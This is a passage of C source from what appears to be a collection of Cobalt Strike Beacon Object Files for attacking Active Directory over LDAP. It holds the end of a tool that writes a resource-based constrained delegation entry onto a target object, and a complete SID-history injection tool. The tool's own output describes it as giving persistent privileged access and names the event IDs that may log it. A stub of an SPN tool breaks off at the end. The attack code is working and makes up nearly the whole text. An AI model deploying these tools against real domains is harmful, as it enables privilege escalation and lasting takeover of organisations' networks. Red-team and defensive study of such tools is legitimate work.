        BeaconPrintf(CALLBACK_ERROR, "[-] Principal identifier is required");
        return;
    }


    // Parse ACE parameters (use defaults if not provided)
    ACCESS_MASK accessMask = GENERIC_ALL; // Default to GenericAll for RBCD
    // if (accessMaskStr && MSVCRT$strlen(accessMaskStr) > 0) {
    //     accessMask = ParseAccessMask(accessMaskStr);
    //     if (accessMask == 0) {
    //         BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse access mask, using GenericAll");
    //         accessMask = GENERIC_ALL;
    //     }
    //     BeaconPrintf(CALLBACK_OUTPUT, "[*] Access Mask: %s (0x%08x)", accessMaskStr, accessMask);
    // } else {
    //     BeaconPrintf(CALLBACK_OUTPUT, "[*] Access Mask: GenericAll (0x%08x) [default]", accessMask);
    // }

    BYTE aceType = ACCESS_ALLOWED_ACE_TYPE; // Default to Allow
    // if (aceTypeStr && MSVCRT$strlen(aceTypeStr) > 0) {
    //     aceType = ParseAceType(aceTypeStr);
    //     BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE Type: %s (0x%02x)", aceTypeStr, aceType);
    // } else {
    //     BeaconPrintf(CALLBACK_OUTPUT, "[*] ACE Type: Allow (0x%02x) [default]", aceType);
    // }

    if (searchOu && MSVCRT$strlen(searchOu) > 0) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Search OU: %s", searchOu);
    }

    if (dcAddress && MSVCRT$strlen(dcAddress) > 0) {
    }

    if (useLdaps) {
    }

    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }

    // Get default naming context
    char* defaultNC = NULL;
    char* targetDN = NULL;
    char* principalDN = NULL;

    defaultNC = GetDefaultNamingContext(ld, dcHostname);
    if (!defaultNC) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    // Resolve target DN
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {

        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);

        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve target DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Target '%s' not found", targetIdentifier);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }

    // Resolve principal DN and get SID

    if (isPrincipalDN) {
        size_t len = MSVCRT$strlen(principalIdentifier) + 1;
        principalDN = (char*)MSVCRT$malloc(len);
        if (principalDN) {
            MSVCRT$strcpy(principalDN, principalIdentifier);
        }
    } else {
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        principalDN = FindObjectDN(ld, principalIdentifier, searchBase);

        if (!principalDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve principal DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Principal '%s' not found", principalIdentifier);
            if (targetDN) MSVCRT$free(targetDN);
            MSVCRT$free(defaultNC);
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Resolved principal DN: %s", principalDN);
    }

    // Get principal's objectSid
    PSID pPrincipalSid = GetObjectSid(ld, principalDN);

    if (!pPrincipalSid) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve principal's objectSid");
        if (principalDN) MSVCRT$free(principalDN);
        if (targetDN) MSVCRT$free(targetDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    if (!ADVAPI32$IsValidSid(pPrincipalSid)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Retrieved principal SID is invalid");
        MSVCRT$free(pPrincipalSid);
        if (principalDN) MSVCRT$free(principalDN);
        if (targetDN) MSVCRT$free(targetDN);
        MSVCRT$free(defaultNC);
        if (dcHostname) MSVCRT$free(dcHostname);
        CleanupLDAP(ld);
        return;
    }

    char* principalSidStr = SidToString(pPrincipalSid);
    if (principalSidStr) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Principal SID: %s", principalSidStr);
        MSVCRT$free(principalSidStr);
    }

    // Read current RBCD configuration (if any)
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Reading current RBCD configuration...");

    LDAPMessage* searchResult = NULL;
    LDAPMessage* entry = NULL;
    char* attrs[] = { "msDS-AllowedToActOnBehalfOfOtherIdentity", NULL };
    struct berval** values = NULL;
    BERVAL* currentRbcdBerval = NULL;

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        targetDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to search for object");
        PrintLdapError("Search for RBCD attribute", result);
        goto cleanup;
    }

    entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Object not found");
        WLDAP32$ldap_msgfree(searchResult);
        goto cleanup;
    }

    // Get current RBCD configuration
    values = WLDAP32$ldap_get_values_len(ld, entry, "msDS-AllowedToActOnBehalfOfOtherIdentity");

    PACL pOldDacl = NULL;
    BOOL rbcdExists = FALSE;

    if (values && values[0]) {
        rbcdExists = TRUE;
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Found existing RBCD configuration (%d bytes)", values[0]->bv_len);

        // Allocate and copy
        currentRbcdBerval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
        if (currentRbcdBerval) {
            currentRbcdBerval->bv_len = values[0]->bv_len;
            currentRbcdBerval->bv_val = (char*)MSVCRT$malloc(currentRbcdBerval->bv_len);
            if (currentRbcdBerval->bv_val) {
                MSVCRT$memcpy(currentRbcdBerval->bv_val, values[0]->bv_val, currentRbcdBerval->bv_len);
            }
        }

        // Parse to get the DACL
        PSECURITY_DESCRIPTOR pSD = (PSECURITY_DESCRIPTOR)values[0]->bv_val;
        BOOL daclPresent = FALSE;
        BOOL daclDefaulted = FALSE;

        if (ADVAPI32$GetSecurityDescriptorDacl(pSD, &daclPresent, &pOldDacl, &daclDefaulted)) {
            if (daclPresent && pOldDacl) {
                ACL_SIZE_INFORMATION aclInfo;
                if (ADVAPI32$GetAclInformation(pOldDacl, &aclInfo, sizeof(aclInfo), AclSizeInformation)) {
                    BeaconPrintf(CALLBACK_OUTPUT, "[*] Current RBCD DACL has %d ACE(s)", aclInfo.AceCount);
                }
            } else {
                BeaconPrintf(CALLBACK_OUTPUT, "[*] Current RBCD has empty DACL");
            }
        }

        WLDAP32$ldap_value_free_len(values);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No existing RBCD configuration found, will create new one");
    }

    WLDAP32$ldap_msgfree(searchResult);

    // Create new DACL with the principal
    PACL pNewDacl = CreateNewDaclWithAce(
        pOldDacl,
        pPrincipalSid,
        accessMask,
        aceType,
        0, // No inheritance flags for RBCD
        NULL, // No object type GUID
        NULL  // No inherited object type GUID
    );

    if (!pNewDacl) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to create new RBCD DACL");
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully created new RBCD DACL");

    // Create new security descriptor
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Building new RBCD security descriptor...");
    BYTE absoluteSDBuffer[SECURITY_DESCRIPTOR_MIN_LENGTH];
    PSECURITY_DESCRIPTOR pNewSD = (PSECURITY_DESCRIPTOR)absoluteSDBuffer;

    if (!ADVAPI32$InitializeSecurityDescriptor(pNewSD, SECURITY_DESCRIPTOR_REVISION)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize new security descriptor");
        MSVCRT$free(pNewDacl);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }

    // Set the new DACL
    if (!ADVAPI32$SetSecurityDescriptorDacl(pNewSD, TRUE, pNewDacl, FALSE)) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set new DACL in security descriptor");
        MSVCRT$free(pNewDacl);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }

    // Set owner and group in the security descriptor
    // For RBCD, we need valid owner/group or AD will reject with constraint violation
    if (rbcdExists && currentRbcdBerval && currentRbcdBerval->bv_val) {
        // If there was an existing SD, preserve owner and group
        PSECURITY_DESCRIPTOR pOldSD = (PSECURITY_DESCRIPTOR)currentRbcdBerval->bv_val;

        PSID pOwner = NULL;
        BOOL ownerDefaulted = FALSE;
        if (ADVAPI32$GetSecurityDescriptorOwner(pOldSD, &pOwner, &ownerDefaulted) && pOwner) {
            ADVAPI32$SetSecurityDescriptorOwner(pNewSD, pOwner, ownerDefaulted);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Preserved existing owner SID");
        }

        PSID pGroup = NULL;
        BOOL groupDefaulted = FALSE;
        if (ADVAPI32$GetSecurityDescriptorGroup(pOldSD, &pGroup, &groupDefaulted) && pGroup) {
            ADVAPI32$SetSecurityDescriptorGroup(pNewSD, pGroup, groupDefaulted);
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Preserved existing group SID");
        }
    } else {
        // No existing RBCD - use the principal's SID as both owner and group
        // This is required by AD or we get constraint violation
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No existing RBCD - setting owner/group to principal SID");
        if (!ADVAPI32$SetSecurityDescriptorOwner(pNewSD, pPrincipalSid, FALSE)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set owner in security descriptor");
            MSVCRT$free(pNewDacl);
            if (currentRbcdBerval) {
                if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
                MSVCRT$free(currentRbcdBerval);
            }
            goto cleanup;
        }
        if (!ADVAPI32$SetSecurityDescriptorGroup(pNewSD, pPrincipalSid, FALSE)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to set group in security descriptor");
            MSVCRT$free(pNewDacl);
            if (currentRbcdBerval) {
                if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
                MSVCRT$free(currentRbcdBerval);
            }
            goto cleanup;
        }
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Owner and group set successfully");
    }

    // Convert to self-relative format for LDAP
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Converting to self-relative format...");
    BERVAL* newRbcdBerval = ConvertSecurityDescriptorToBerval(pNewSD);

    if (!newRbcdBerval) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to convert security descriptor to BERVAL");
        MSVCRT$free(pNewDacl);
        if (currentRbcdBerval) {
            if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
            MSVCRT$free(currentRbcdBerval);
        }
        goto cleanup;
    }

    BeaconPrintf(CALLBACK_OUTPUT, "[+] Converted to self-relative format (%d bytes)", newRbcdBerval->bv_len);

    // Write back to LDAP
    BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Writing RBCD configuration to LDAP...");

    struct berval* modValues[] = { newRbcdBerval, NULL };
    LDAPModA rbcdMod;
    rbcdMod.mod_op = LDAP_MOD_REPLACE | LDAP_MOD_BVALUES;
    rbcdMod.mod_type = "msDS-AllowedToActOnBehalfOfOtherIdentity";
    rbcdMod.mod_vals.modv_bvals = modValues;

    LDAPModA* mods[] = { &rbcdMod, NULL };

    result = WLDAP32$ldap_modify_s(ld, targetDN, mods);

    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "\n[+] SUCCESS: RBCD configured successfully!");

        // Verify by reading back
        BeaconPrintf(CALLBACK_OUTPUT, "\n[*] Verifying RBCD configuration...");

        LDAPMessage* verifyResult = NULL;
        result = WLDAP32$ldap_search_s(ld, targetDN, LDAP_SCOPE_BASE, "(objectClass=*)", attrs, 0, &verifyResult);

        if (result == LDAP_SUCCESS) {
            LDAPMessage* verifyEntry = WLDAP32$ldap_first_entry(ld, verifyResult);
            if (verifyEntry) {
                struct berval** verifyValues = WLDAP32$ldap_get_values_len(ld, verifyEntry, "msDS-AllowedToActOnBehalfOfOtherIdentity");
                if (verifyValues && verifyValues[0]) {
                    PSD_INFO sdInfo = ParseSecurityDescriptor((BYTE*)verifyValues[0]->bv_val, verifyValues[0]->bv_len);
                    if (sdInfo) {
                        BeaconPrintf(CALLBACK_OUTPUT, "[+] Verification: RBCD DACL now has %d ACE(s)", sdInfo->DaclAceCount);

                        // Check if our principal is present
                        char* checkSidStr = SidToString(pPrincipalSid);
                        BOOL foundPrincipal = FALSE;

                        if (checkSidStr) {
                            for (DWORD i = 0; i < sdInfo->DaclAceCount && !foundPrincipal; i++) {
                                if (sdInfo->DaclAces[i].TrusteeSid &&
                                    MSVCRT$strcmp(sdInfo->DaclAces[i].TrusteeSid, checkSidStr) == 0) {
                                    BeaconPrintf(CALLBACK_OUTPUT, "[+] Principal verified in RBCD DACL at index %d", i);
                                    foundPrincipal = TRUE;
                                }
                            }
                            MSVCRT$free(checkSidStr);
                        }

                        if (!foundPrincipal) {
                            BeaconPrintf(CALLBACK_OUTPUT, "[!] Warning: Could not verify principal in RBCD DACL");
                        }

                        FreeSecurityDescriptorInfo(sdInfo);
                    }
                    WLDAP32$ldap_value_free_len(verifyValues);
                }
            }
            WLDAP32$ldap_msgfree(verifyResult);
        }
    } else {
        BeaconPrintf(CALLBACK_ERROR, "\n[-] FAILED to configure RBCD");
        PrintLdapError("Modify RBCD attribute", result);
    }

    // Cleanup
    MSVCRT$free(pNewDacl);
    MSVCRT$free(newRbcdBerval->bv_val);
    MSVCRT$free(newRbcdBerval);
    if (currentRbcdBerval) {
        if (currentRbcdBerval->bv_val) MSVCRT$free(currentRbcdBerval->bv_val);
        MSVCRT$free(currentRbcdBerval);
    }

cleanup:
    if (pPrincipalSid) MSVCRT$free(pPrincipalSid);
    if (principalDN) MSVCRT$free(principalDN);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (dcHostname) MSVCRT$free(dcHostname);
    if (targetDN) MSVCRT$free(targetDN);
    CleanupLDAP(ld);

}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-sidhistory.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

DECLSPEC_IMPORT long __cdecl MSVCRT$strtol(const char* str, char** endptr, int base);
DECLSPEC_IMPORT unsigned long __cdecl MSVCRT$strtoul(const char* str, char** endptr, int base);

// Import SID conversion functions from ADVAPI32
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertStringSidToSidA(LPCSTR StringSid, PSID* Sid);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$ConvertSidToStringSidA(PSID Sid, LPSTR* StringSid);
DECLSPEC_IMPORT PVOID WINAPI KERNEL32$LocalFree(HLOCAL hMem);
DECLSPEC_IMPORT BOOL WINAPI ADVAPI32$IsValidSid(PSID pSid);
DECLSPEC_IMPORT DWORD WINAPI ADVAPI32$GetLengthSid(PSID pSid);

// Get the objectSid attribute from an LDAP entry
BERVAL* GetObjectSid(LDAP* ld, const char* objectDN) {
    if (!ld || !objectDN) return NULL;

    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "objectSid", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)objectDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to query object for SID");
        PrintLdapError("Query objectSid", result);
        return NULL;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        BeaconPrintf(CALLBACK_ERROR, "[-] No entry found");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Get binary SID value
    struct berval** values = WLDAP32$ldap_get_values_len(ld, entry, "objectSid");
    if (!values || !values[0]) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve objectSid");
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    // Allocate and copy the SID
    BERVAL* sidBerval = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
    if (!sidBerval) {
        WLDAP32$ldap_value_free_len(values);
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    sidBerval->bv_len = values[0]->bv_len;
    sidBerval->bv_val = (char*)MSVCRT$malloc(sidBerval->bv_len);
    if (!sidBerval->bv_val) {
        MSVCRT$free(sidBerval);
        WLDAP32$ldap_value_free_len(values);
        WLDAP32$ldap_msgfree(searchResult);
        return NULL;
    }

    MSVCRT$memcpy(sidBerval->bv_val, values[0]->bv_val, sidBerval->bv_len);

    WLDAP32$ldap_value_free_len(values);
    WLDAP32$ldap_msgfree(searchResult);

    return sidBerval;
}

// Convert binary SID to string format for display
char* SidToString(PSID sid) {
    if (!sid || !ADVAPI32$IsValidSid(sid)) {
        return NULL;
    }

    LPSTR stringSid = NULL;
    if (!ADVAPI32$ConvertSidToStringSidA(sid, &stringSid)) {
        return NULL;
    }

    // Copy to our own buffer
    size_t len = MSVCRT$strlen(stringSid) + 1;
    char* result = (char*)MSVCRT$malloc(len);
    if (result) {
        MSVCRT$strcpy(result, stringSid);
    }

    KERNEL32$LocalFree(stringSid);
    return result;
}

// Display current SID history
void DisplaySidHistory(LDAP* ld, const char* objectDN) {
    if (!ld || !objectDN) return;

    LDAPMessage* searchResult = NULL;
    char* attrs[] = { "sAMAccountName", "objectSid", "sidHistory", NULL };

    ULONG result = WLDAP32$ldap_search_s(
        ld,
        (char*)objectDN,
        LDAP_SCOPE_BASE,
        "(objectClass=*)",
        attrs,
        0,
        &searchResult
    );

    if (result != LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Unable to query current SID history");
        return;
    }

    LDAPMessage* entry = WLDAP32$ldap_first_entry(ld, searchResult);
    if (!entry) {
        WLDAP32$ldap_msgfree(searchResult);
        return;
    }

    // Get sAMAccountName for display
    char** samValues = WLDAP32$ldap_get_values(ld, entry, "sAMAccountName");
    if (samValues && samValues[0]) {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Account: %s", samValues[0]);
        WLDAP32$ldap_value_free(samValues);
    }

    // Get and display objectSid
    struct berval** sidValues = WLDAP32$ldap_get_values_len(ld, entry, "objectSid");
    if (sidValues && sidValues[0]) {
        char* sidStr = SidToString((PSID)sidValues[0]->bv_val);
        if (sidStr) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Current SID: %s", sidStr);
            MSVCRT$free(sidStr);
        }
        WLDAP32$ldap_value_free_len(sidValues);
    }

    // Get and display sidHistory
    struct berval** historyValues = WLDAP32$ldap_get_values_len(ld, entry, "sidHistory");
    if (historyValues) {
        int count = 0;
        while (historyValues[count] != NULL) count++;

        if (count > 0) {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] Existing SID History (%d):", count);
            for (int i = 0; i < count; i++) {
                char* sidStr = SidToString((PSID)historyValues[i]->bv_val);
                if (sidStr) {
                    BeaconPrintf(CALLBACK_OUTPUT, "    [%d] %s", i + 1, sidStr);
                    MSVCRT$free(sidStr);
                }
            }
        } else {
            BeaconPrintf(CALLBACK_OUTPUT, "[*] No existing SID history");
        }
        WLDAP32$ldap_value_free_len(historyValues);
    } else {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] No existing SID history");
    }

    WLDAP32$ldap_msgfree(searchResult);
}

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);
    
    // Parse arguments: target_identifier, is_target_dn, sid_source, is_sid_source_dn,
    // search_ou, dc_address, use_ldaps
    char* targetIdentifier = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isTargetDN = BeaconDataInt(&parser);
    char* sidSource = ValidateInput(BeaconDataExtract(&parser, NULL));
    int isSidSourceDN = BeaconDataInt(&parser);
    char* searchOu = ValidateInput(BeaconDataExtract(&parser, NULL));
    char* dcAddress = ValidateInput(BeaconDataExtract(&parser, NULL));
    int useLdaps = BeaconDataInt(&parser);
    
    if (!targetIdentifier || MSVCRT$strlen(targetIdentifier) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Target object identifier is required");
        return;
    }
    
    if (!sidSource || MSVCRT$strlen(sidSource) == 0) {
        BeaconPrintf(CALLBACK_ERROR, "[-] SID source is required");
        BeaconPrintf(CALLBACK_ERROR, "[!] Can be: SID string (S-1-5-...), username, or DN");
        return;
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "");
    BeaconPrintf(CALLBACK_OUTPUT, "[!] ========================================");
    BeaconPrintf(CALLBACK_OUTPUT, "[!] WARNING: SID HISTORY INJECTION");
    BeaconPrintf(CALLBACK_OUTPUT, "[!] ========================================");
    BeaconPrintf(CALLBACK_OUTPUT, "[!] This is a HIGH-PRIVILEGE operation that:");
    BeaconPrintf(CALLBACK_OUTPUT, "[!]   - Requires DS-Install-Replica rights or equivalent");
    BeaconPrintf(CALLBACK_OUTPUT, "[!]   - May be logged extensively (Event ID 4765, 4766)");
    BeaconPrintf(CALLBACK_OUTPUT, "[!]   - Can trigger security alerts");
    BeaconPrintf(CALLBACK_OUTPUT, "[!]   - Provides persistent privileged access");
    BeaconPrintf(CALLBACK_OUTPUT, "");
    
    BeaconPrintf(CALLBACK_OUTPUT, "[*] SID source: %s", sidSource);
    
    // Initialize LDAP connection
    char* dcHostname = NULL;
    LDAP* ld = InitializeLDAPConnection(dcAddress, useLdaps, &dcHostname);
    if (!ld) {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to initialize LDAP connection");
        return;
    }
    
    char* defaultNC = NULL;
    char* targetDN = NULL;
    
    if (!isTargetDN) {
        
        defaultNC = GetDefaultNamingContext(ld, dcHostname);
        if (!defaultNC) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to get default naming context");
            if (dcHostname) MSVCRT$free(dcHostname);
            CleanupLDAP(ld);
            return;
        }
    }
    
    // Resolve target DN
    if (isTargetDN) {
        size_t len = MSVCRT$strlen(targetIdentifier) + 1;
        targetDN = (char*)MSVCRT$malloc(len);
        if (targetDN) {
            MSVCRT$strcpy(targetDN, targetIdentifier);
        }
    } else {
        
        char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
        targetDN = FindObjectDN(ld, targetIdentifier, searchBase);
        
        if (!targetDN) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve target DN");
            BeaconPrintf(CALLBACK_ERROR, "[!] Target '%s' not found", targetIdentifier);
            if (defaultNC) MSVCRT$free(defaultNC);
            CleanupLDAP(ld);
            return;
        }
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "");
    
    // Display current state
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Current target object state:");
    DisplaySidHistory(ld, targetDN);
    BeaconPrintf(CALLBACK_OUTPUT, "");
    
    // Determine SID to add
    BERVAL* sidToAdd = NULL;
    char* sidString = NULL;
    
    // Check if sidSource is a string SID (starts with "S-")
    if (sidSource[0] == 'S' && sidSource[1] == '-') {
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Parsing string SID...");
        
        // Convert string SID to binary
        PSID binarySid = NULL;
        if (!ADVAPI32$ConvertStringSidToSidA(sidSource, &binarySid)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to parse SID string");
            BeaconPrintf(CALLBACK_ERROR, "[!] Invalid SID format: %s", sidSource);
            goto cleanup;
        }
        
        if (!ADVAPI32$IsValidSid(binarySid)) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Invalid SID");
            KERNEL32$LocalFree(binarySid);
            goto cleanup;
        }
        
        // Create BERVAL from binary SID
        DWORD sidLen = ADVAPI32$GetLengthSid(binarySid);
        sidToAdd = (BERVAL*)MSVCRT$malloc(sizeof(BERVAL));
        if (sidToAdd) {
            sidToAdd->bv_len = sidLen;
            sidToAdd->bv_val = (char*)MSVCRT$malloc(sidLen);
            if (sidToAdd->bv_val) {
                MSVCRT$memcpy(sidToAdd->bv_val, binarySid, sidLen);
            } else {
                MSVCRT$free(sidToAdd);
                sidToAdd = NULL;
            }
        }
        
        sidString = (char*)MSVCRT$malloc(MSVCRT$strlen(sidSource) + 1);
        if (sidString) {
            MSVCRT$strcpy(sidString, sidSource);
        }
        
        KERNEL32$LocalFree(binarySid);
        
        if (!sidToAdd || !sidToAdd->bv_val) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to allocate SID buffer");
            goto cleanup;
        }
        
        
    } else {
        // Resolve SID from object (DN or username)
        
        char* sourceDN = NULL;
        
        if (isSidSourceDN) {
            // Use provided DN
            size_t len = MSVCRT$strlen(sidSource) + 1;
            sourceDN = (char*)MSVCRT$malloc(len);
            if (sourceDN) {
                MSVCRT$strcpy(sourceDN, sidSource);
            }
        } else {
            // Search for source object by username
            char* searchBase = (searchOu && MSVCRT$strlen(searchOu) > 0) ? searchOu : defaultNC;
            sourceDN = FindObjectDN(ld, sidSource, searchBase);
            
            if (!sourceDN) {
                BeaconPrintf(CALLBACK_ERROR, "[-] Failed to resolve source object");
                BeaconPrintf(CALLBACK_ERROR, "[!] Source '%s' not found", sidSource);
                goto cleanup;
            }
        }
        
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Source DN: %s", sourceDN);
        
        // Get SID from source object
        sidToAdd = GetObjectSid(ld, sourceDN);
        MSVCRT$free(sourceDN);
        
        if (!sidToAdd) {
            BeaconPrintf(CALLBACK_ERROR, "[-] Failed to retrieve SID from source object");
            goto cleanup;
        }
        
        // Convert to string for display
        sidString = SidToString((PSID)sidToAdd->bv_val);
        if (sidString) {
        }
    }
    
    BeaconPrintf(CALLBACK_OUTPUT, "");
    BeaconPrintf(CALLBACK_OUTPUT, "[*] Adding SID to sidHistory attribute...");
    
    // Prepare LDAP modification
    BERVAL* sid_bervals[2] = { sidToAdd, NULL };
    LDAPModA sid_mod;
    sid_mod.mod_op = LDAP_MOD_ADD | LDAP_MOD_BVALUES;
    sid_mod.mod_type = "sidHistory";
    sid_mod.mod_vals.modv_bvals = sid_bervals;
    
    LDAPModA* mods[] = { &sid_mod, NULL };
    
    // Perform modification
    ULONG result = WLDAP32$ldap_modify_s(ld, targetDN, mods);
    
    if (result == LDAP_SUCCESS) {
        BeaconPrintf(CALLBACK_OUTPUT, "[+] Successfully added SID to sidHistory!");
        BeaconPrintf(CALLBACK_OUTPUT, "");
        if (sidString) {
            BeaconPrintf(CALLBACK_OUTPUT, "[+] Added SID: %s", sidString);
        }
        BeaconPrintf(CALLBACK_OUTPUT, "");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] The target object now has the privileges of the SID added");
        BeaconPrintf(CALLBACK_OUTPUT, "[*] This change persists across password resets");
        BeaconPrintf(CALLBACK_OUTPUT, "");
        
        // Display updated state
        BeaconPrintf(CALLBACK_OUTPUT, "[*] Updated object state:");
        DisplaySidHistory(ld, targetDN);
        
    } else {
        BeaconPrintf(CALLBACK_ERROR, "[-] Failed to add SID to sidHistory");
        PrintLdapError("Add sidHistory", result);
        BeaconPrintf(CALLBACK_OUTPUT, "");
        
        if (result == LDAP_INSUFFICIENT_RIGHTS) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Insufficient permissions\n"
            "[!] Required rights:\n"
            "[!]   - DS-Install-Replica (domain controller install rights)\n"
            "[!]   - Or 'Migrate SID History' extended right\n"
            "[!]   - Typically only Domain Admins or Enterprise Admins");
        } else if (result == LDAP_UNWILLING_TO_PERFORM) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Server refused to perform operation\n"
            "[!] Possible causes:\n"
            "[!]   - SID filtering is enabled\n"
            "[!]   - Target is a protected account\n"
            "[!]   - Forest functional level restrictions");
        } else if (result == LDAP_CONSTRAINT_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Constraint violation\n"
            "[!] Possible causes:\n"
            "[!]   - SID already exists in sidHistory\n"
            "[!]   - SID is from same domain (not allowed)\n"
            "[!]   - Invalid SID format");
        } else if (result == LDAP_OBJECT_CLASS_VIOLATION) {
            BeaconPrintf(CALLBACK_ERROR, "[!] Target object type doesn't support sidHistory");
            BeaconPrintf(CALLBACK_ERROR, "[!] sidHistory is only valid on user and computer objects");
        }
    }
    
cleanup:
    // Cleanup
    if (sidToAdd) {
        if (sidToAdd->bv_val) MSVCRT$free(sidToAdd->bv_val);
        MSVCRT$free(sidToAdd);
    }
    if (sidString) MSVCRT$free(sidString);
    if (defaultNC) MSVCRT$free(defaultNC);
    if (targetDN) MSVCRT$free(targetDN);
    if (dcHostname) MSVCRT$free(dcHostname);
    CleanupLDAP(ld);
    
    BeaconPrintf(CALLBACK_OUTPUT, "");
}

================================================
FILE: AD-BOF/LDAP-BOF/src/add/add-spn.c
================================================
#include <windows.h>
#include "beacon.h"
#include "ldap_common.c"

void go(char *args, int alen) {
    datap parser;
    BeaconDataParse(&parser, args, alen);

